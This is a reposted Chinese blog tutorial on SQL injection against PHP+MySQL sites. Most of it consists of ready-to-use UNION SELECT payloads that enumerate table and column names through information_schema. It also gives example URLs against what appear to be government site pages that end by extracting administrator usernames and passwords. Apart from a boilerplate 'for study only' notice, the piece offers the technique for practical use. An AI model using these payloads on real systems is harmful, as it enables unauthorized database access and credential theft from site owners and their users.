数据库注入式攻击,php爆数据库,php+MySql注入非暴力爆数据库表段

 2023-09-23 阅读 18 评论 0

摘要:某群主发了一篇《php+MySql注入非暴力爆数据库表段》的科普,那样的都可以发,我只好也一起发科普了。数据库注入式攻击、Author:Juliet科普:《php+MySql注入非暴力爆数据库表段》的原文:鉴于好多人问我关于注入猜不到表的问题,我发

某群主发了一篇《php+MySql注入非暴力爆数据库表段》的科普,那样的都可以发,我只好也一起发科普了。

数据库注入式攻击、Author:Juliet

科普:

《php+MySql注入非暴力爆数据库表段》的原文:

鉴于好多人问我关于注入猜不到表的问题,我发一下相关事例吧,其实MySql数据库的版本够了,不需要暴力猜表的,而是“查”表

表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出

查表段时的格式是:

+union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=数据库名字的hex order by table_schema limit 6,1)t limit 1--

复制代码

那么,查字段的格式就是:

+union select 1,2,column_name from (select * from information_schema.columns where table_name=爆出来的表名的hex值 and table_schema=数据库名的hex值 order by 1 limit 2,1)t limit 1--

复制代码

与爆表类似

在最后一个limit 6,1很明显是范围,从0,1、1,1、2,1、3,1的这么查下去就可以了,直到查出来想要的表名

看一个实例:

爆表:

http://www.xxx.gov.cn/newinfo.php?id=125+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10+from+(select+*+from+information_schema.tables+where+table_schema=0x796B7873676F76+order+by+table_schema+limit+0,1)t+limit+1--

复制代码

爆字:

http://www.xxx.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,column_name,4,5+from+(select+*+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72+and+table_schema=0x796B7873676F76+order+by+1+limit+2,1)t+limit+1--

复制代码

使用前面爆出来的:

http://www.xxx.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat(uid,0x5f,pwd)+from+administrator

版权声明:本站所有资料均为网友推荐收集整理而来,仅供学习和研究交流使用。

原文链接:https://hbdhgg.com/4/89680.html

发表评论:

本站为非赢利网站,部分文章来源或改编自互联网及其他公众平台,主要目的在于分享信息,版权归原作者所有,内容仅供读者参考,如有侵权请联系我们删除!

Copyright © 2022 匯編語言學習筆記 Inc. 保留所有权利。

底部版权信息